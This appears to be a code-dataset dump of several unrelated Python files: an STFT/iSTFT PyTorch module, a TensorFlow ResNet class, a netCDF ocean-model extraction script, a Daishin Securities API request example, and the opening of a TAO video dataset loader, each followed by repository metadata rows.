lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
if th.sum(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
| 34.849462
| 121
| 0.538671
| 2,492
| 19,446
| 4.085474
| 0.135634
| 0.02986
| 0.01768
| 0.022984
| 0.406443
| 0.356547
| 0.313132
| 0.29781
| 0.259994
| 0.222179
| 0
| 0.01631
| 0.353646
| 19,446
| 557
| 122
| 34.912029
| 0.793699
| 0.270236
| 0
| 0.294833
| 0
| 0
| 0.063127
| 0.009135
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051672
| false
| 0
| 0.024316
| 0.006079
| 0.136778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c517119112a50b7dbf0616dc32615e3180ecafa
| 3,427
|
py
|
Python
|
applications/tensorflow/cnns/models/resnet.py
|
xihuaiwen/chinese_bert
|
631afbc76c40b0ac033be2186e717885246f446c
|
[
"MIT"
] | null | null | null |
applications/tensorflow/cnns/models/resnet.py
|
xihuaiwen/chinese_bert
|
631afbc76c40b0ac033be2186e717885246f446c
|
[
"MIT"
] | null | null | null |
applications/tensorflow/cnns/models/resnet.py
|
xihuaiwen/chinese_bert
|
631afbc76c40b0ac033be2186e717885246f446c
|
[
"MIT"
] | null | null | null |
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
class TensorflowResNet(ResNet):
def __init__(self, *args, **kwargs):
self.dtype = tf.float16
super(TensorflowResNet, self).__init__(*args, **kwargs)
def _get_variable(self, name, shape, init):
return tf.get_variable(name, shape, initializer=init, dtype=self.dtype)
def residual(self, x, shortcut, out_filters, stride, type='B'):
in_shape = shortcut.get_shape()
pad = int(x.get_shape()[3] - in_shape[3])
if pad != 0 or type == 'C':
if type == 'A':
shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape,
strides=[1, stride, stride, 1])
shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]])
else:
shortcut = self.conv(shortcut, 1, stride, out_filters)
shortcut = self.norm(shortcut)
x = shortcut + x
x = self.relu(x)
return x
def relu(self, x):
return tf.nn.relu(x)
def conv(self, x, ksize, stride, filters_out, bias=True):
filters_in = x.get_shape()[-1]
wshape = [ksize, ksize, filters_in, filters_out]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
weights = self._get_variable('weights', shape=wshape, init=w_init)
x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME')
if bias:
bshape = [filters_out]
b_init = tf.zeros_initializer()
biases = self._get_variable('biases', shape=bshape, init=b_init)
x = x + biases
return x
def norm(self, x, type='BATCH', groups=32, training=False):
if type == 'BATCH':
# Perhaps use tf.nn.fused_batch_norm instead.
x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True,
training=training, trainable=training,
momentum=0.997, epsilon=1e-5)
elif type == 'GROUP':
x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True,
training=training, trainable=training,
channels_axis=-1, reduction_axes=[-3, -2])
return x
def fc(self, x, num_units_out):
num_units_in = x.get_shape()[1]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
b_init = tf.constant_initializer(0.0)
with self.namescope('fc'):
weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init)
biases = self._get_variable('biases', shape=[num_units_out], init=b_init)
x = tf.nn.xw_plus_b(x, weights, biases)
return x
def reduce_mean(self, x, indices=(1, 2)):
x = tf.reduce_mean(x, reduction_indices=indices)
return x
def maxpool(self, x):
x = tf.nn.max_pool(
x,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='SAME')
return x
def namescope(self, debug_string):
return tf.variable_scope(debug_string)
| 38.505618
| 101
| 0.569594
| 438
| 3,427
| 4.287671
| 0.280822
| 0.01065
| 0.011182
| 0.01065
| 0.194356
| 0.181576
| 0.107561
| 0.107561
| 0.052183
| 0
| 0
| 0.022015
| 0.310767
| 3,427
| 88
| 102
| 38.943182
| 0.773074
| 0.030055
| 0
| 0.144928
| 0
| 0
| 0.016265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.144928
| false
| 0
| 0.057971
| 0.043478
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c551d5c25c26d348d1738fdb22529ee094e17ed
| 8,942
|
py
|
Python
|
rawcdf_extract.py
|
bedaro/ssm-analysis
|
09880dbfa5733d6301b84accc8f42a5ee320d698
|
[
"MIT"
] | null | null | null |
rawcdf_extract.py
|
bedaro/ssm-analysis
|
09880dbfa5733d6301b84accc8f42a5ee320d698
|
[
"MIT"
] | null | null | null |
rawcdf_extract.py
|
bedaro/ssm-analysis
|
09880dbfa5733d6301b84accc8f42a5ee320d698
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
def get_node_ids(shps, masked):
merged = None
for i,shp in enumerate(shps):
df = gpd.read_file(shp)
df.set_index('node_id', inplace=True)
logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df)))
if merged is None:
merged = df.index
else:
merged = merged.union(df.index)
logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format(
len(merged), len(shps)))
masked_nodes = np.loadtxt(masked)
merged = merged.difference(masked_nodes)
logger.debug("{0} nodes left after masking".format(len(merged)))
return merged.to_numpy()
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
def init_output(output_cdf, indata, nodes, **kwargs):
args = Namespace(**kwargs)
output = Dataset(output_cdf, "w")
timeDim = output.createDimension('time', len(indata.dimensions['time']))
nodeDim = output.createDimension('node', len(nodes))
nodeVar = output.createVariable('node', "i4", ('node',))
output['node'][:] = nodes
timeVar = output.createVariable('time', "f4", ('time',))
# Iterate over all output variables
# If an extraction attribute is "all":
# - add the 'siglay' dimension to the output if it's not already present
# - include the 'siglay' dimension on the output variable
# - add a 'zeta' output variable
for var, attr in args.input_vars:
if attr == InputAttr.ALL:
siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS
output.createDimension('siglay', len(siglayers))
output.createVariable('siglay', 'f4', ('siglay',))
output['siglay'][:] = siglayers
if 'zeta' in indata.variables:
output.createVariable('zeta', 'f4', ('time','node'))
break
return output
def append_output(output_cdf):
return Dataset(output_cdf, 'a')
def init_output_vars(output, **kwargs):
args = Namespace(**kwargs)
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.BOTTOM:
out_name += "_bottom"
# TODO handle photic case
dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node')
output.createVariable(out_name, 'f4', dims)
# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i+n]
class InputAttr(Enum):
ALL = 0
BOTTOM = 1
# TODO add "photic" for the photic zone
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
def colon_meta(string):
var, attr = string.split(':', 2)
return (var, attr_strings[attr])
def main():
script_home = os.path.dirname(os.path.realpath(__file__))
parser = ArgumentParser(description="Extract data from SSM netcdf output files")
parser.add_argument("incdf", nargs="+", help="each input CDF file")
parser.add_argument("outcdf",
help="the output CDF file (created if it doesn't exist)")
parser.add_argument("outprefix",
help="a prefix for the extracted variables in the output CDF")
parser.add_argument("-d", dest="domain_node_shapefiles", action="append",
help="Specify a domain node shapefile")
parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'),
help="Specify a different masked nodes text file")
parser.add_argument("--invar", dest="input_vars", type=colon_meta,
action="append",
help="Extract the values of a different output variable")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
help="Print progress messages during the extraction")
parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size",
help="Process this many CDF files at once")
parser.add_argument("--cache", dest="cache", action="store_true",
help="Use a read/write cache in a temporary directory")
# Cannot include default values of lists here, see
# https://bugs.python.org/issue16399
parser.set_defaults(chunk_size=4, verbose=False,
masked_nodes_file=os.path.join(script_home, masked_nodes_txt))
args = parser.parse_args()
# This is the workaround
if not args.input_vars:
args.input_vars = [("DOXG",InputAttr.BOTTOM)]
if not args.domain_node_shapefiles:
args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)]
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
#logger.setLevel(logging.DEBUG)
if args.cache:
with tempfile.TemporaryDirectory() as tmpdir:
exist_cdfs = []
logger.info("Caching input files...")
for infile in args.incdf:
newpath = os.path.join(tmpdir, os.path.basename(infile))
shutil.copy(infile, newpath)
exist_cdfs.append(newpath)
output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf))
if os.path.exists(args.outcdf):
logger.info("Caching output file...")
shutil.copy(args.outcdf, output_cdf)
do_extract(exist_cdfs, output_cdf, **vars(args))
# Copy the resulting output CDF back
logger.info("Saving output file...")
shutil.copy(output_cdf, args.outcdf)
logger.info("Finished.")
else:
do_extract(args.incdf, args.outcdf, **vars(args))
def do_extract(exist_cdfs, output_cdf, **kwargs):
args = Namespace(**kwargs)
logger.info("Determining scope of work...")
indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0])
node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file)
logger.info("Initializing output file...")
if not os.path.exists(output_cdf):
outdata = init_output(output_cdf, indata, node_ids, **vars(args))
outdata['time'][:] = indata['time'][:] / 3600 / 24
else:
outdata = append_output(output_cdf)
init_output_vars(outdata, **vars(args))
# Attempts to use the entire MFDataset don't seem to scale well.
# Instead, I'm resorting to a blocking approach where MFDatasets are
# created for only a few netCDF files at a time
indata.close()
i = 0
total = 0
logger.info("Beginning extraction...")
start_time = time.perf_counter()
times_ct = outdata.dimensions['time'].size
for cdfchunk in chunks(exist_cdfs, args.chunk_size):
c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0])
chunk_times = len(c.dimensions['time'])
data = copy_data(c, outdata, i, node_ids, **vars(args))
i += chunk_times
c.close()
elapsed = (time.perf_counter() - start_time)
to_go = elapsed * (times_ct / i - 1)
total += np.sum([d.size * d.itemsize for k,d in data.items()])
logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i,
times_ct, int(elapsed), int(to_go), int(total/elapsed/1000)))
logger.info("Extraction finished.")
outdata.close()
def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs):
args = Namespace(**kwargs)
times_ct = len(cdfin.dimensions['time'])
alldata = {}
# Copy zeta if it's needed
if 'zeta' in cdfout.variables:
alldata['zeta'] = cdfin['zeta'][:, node_ids - 1]
cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta']
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.ALL:
slc = slice(None)
elif attr == InputAttr.BOTTOM:
slc = -1
out_name += "_bottom"
# TODO add "photic" case which will look rather different
data = cdfin[var][:, slc, node_ids - 1]
logger.debug("data is shape " + str(data.shape))
if attr == InputAttr.ALL:
cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data
else:
cdfout[out_name][timeidx:timeidx+times_ct,:] = data
alldata[out_name] = data
return alldata
if __name__ == "__main__": main()
| 40.461538
| 117
| 0.64225
| 1,177
| 8,942
| 4.75616
| 0.268479
| 0.024116
| 0.027331
| 0.017864
| 0.086995
| 0.060915
| 0.051268
| 0.036084
| 0.022508
| 0.022508
| 0
| 0.020574
| 0.228137
| 8,942
| 220
| 118
| 40.645455
| 0.790496
| 0.113509
| 0
| 0.103448
| 0
| 0.005747
| 0.146184
| 0.002784
| 0
| 0
| 0
| 0.004545
| 0
| 1
| 0.051724
| false
| 0
| 0.057471
| 0.005747
| 0.155172
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c55bbb06ea35dd59d573da6a8f782da8c81fbf2
| 3,548
|
py
|
Python
|
tutorial/43.py
|
mssung94/daishin-trading-system
|
d6682495afb7a08e68db65537b1d1789f2996891
|
[
"MIT"
] | 2
|
2020-11-21T08:45:26.000Z
|
2020-11-21T08:50:56.000Z
|
tutorial/43.py
|
mssung94/daishin-trading-system
|
d6682495afb7a08e68db65537b1d1789f2996891
|
[
"MIT"
] | null | null | null |
tutorial/43.py
|
mssung94/daishin-trading-system
|
d6682495afb7a08e68db65537b1d1789f2996891
|
[
"MIT"
] | null | null | null |
# 대신증권 API
# 데이터 요청 방법 2가지 BlockRequest 와 Request 방식 비교 예제
# 플러스 API 에서 데이터를 요청하는 방법은 크게 2가지가 있습니다
#
# BlockRequest 방식 - 가장 간단하게 데이터 요청해서 수신 가능
# Request 호출 후 Received 이벤트로 수신 받기
#
# 아래는 위 2가지를 비교할 수 있도록 만든 예제 코드입니다
# 일반적인 데이터 요청에는 BlockRequest 방식이 가장 간단합니다
# 다만, BlockRequest 함수 내에서도 동일 하게 메시지펌핑을 하고 있어 해당 통신이 마치기 전에 실시간 시세를 수신 받거나
# 다른 이벤트에 의해 재귀 호출 되는 문제가 있을 경우 함수 호출이 실패할 수 있습니다
# 복잡한 실시간 시세 수신 중에 통신을 해야 하는 경우에는 Request 방식을 이용해야 합니다.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
self.client = client # CP 실시간 통신 object
self.name = name # 서비스가 다른 이벤트를 구분하기 위한 이름
self.caller = caller # callback 을 위해 보관
def OnReceived(self):
# 실시간 처리 - 현재가 주문 체결
if self.name == 'stockmst':
print('recieved')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest 로 수신 받은 데이터')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
print('')
##############################################################
# 2. Request ==> 메시지 펌프 ==> OnReceived 이벤트 수신
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
| 31.39823
| 84
| 0.590755
| 421
| 3,548
| 4.931116
| 0.546318
| 0.026975
| 0.023121
| 0.021195
| 0.174374
| 0.11368
| 0.11368
| 0.11368
| 0.11368
| 0.11368
| 0
| 0.026528
| 0.266911
| 3,548
| 112
| 85
| 31.678571
| 0.771626
| 0.273675
| 0
| 0.289855
| 0
| 0
| 0.106586
| 0.032062
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0.014493
| 0.057971
| 0
| 0.188406
| 0.15942
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c56a26b957f0f1d768b5949bae27c075bbc9817
| 10,280
|
py
|
Python
|
datasets/tao/tao.py
|
Nik-V9/AirObject
|
5937e64531f08449e81d2c90e3c6643727efbaf0
|
[
"BSD-3-Clause"
] | 9
|
2022-03-15T17:28:48.000Z
|
2022-03-29T12:32:28.000Z
|
datasets/tao/tao.py
|
Nik-V9/AirObject
|
5937e64531f08449e81d2c90e3c6643727efbaf0
|
[
"BSD-3-Clause"
] | 1
|
2022-03-29T06:03:14.000Z
|
2022-03-29T13:38:29.000Z
|
datasets/tao/tao.py
|
Nik-V9/AirObject
|
5937e64531f08449e81d2c90e3c6643727efbaf0
|
[
"BSD-3-Clause"
] | 1
|
2022-03-15T19:34:06.000Z
|
2022-03-15T19:34:06.000Z
|
from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
class TAO(data.Dataset):
r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of
rgb images, instance segmentation labels, SuperPoint features (optional).
Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:
.. code-block::
sequence0
┎───────────────┲───────────────┲───────────────┒
| | | |
frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ...
| | | |
└───────────────┵───────────────┵────────────────┚
sequence1
Args:
basedir (str): Path to the base directory containing the directories from TAO.
videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
be path to a `.txt` file where each line is a Video Seqeunce name, a tuple of scene names.
seqlen (int): Number of frames to use for each sequence of frames. Default: 4
dilation (int or None): Number of (original video's) frames to skip between two consecutive
frames in the extracted sequence. See above example if unsure.
If None, will set `dilation = 0`. Default: None
stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
(non-overlapping sequences). Default: None
start (int or None): Index of the frame from which to start extracting sequences for every video.
If None, will start from the first frame. Default: None
end (int): Index of the frame at which to stop extracting sequences for every video.
If None, will continue extracting frames until the end of the video. Default: None
height (int): Spatial height to resize frames to. Default: 480
width (int): Spatial width to resize frames to. Default: 640
return_seg (bool): Determines whether to return instance segmentation labels. Default: True
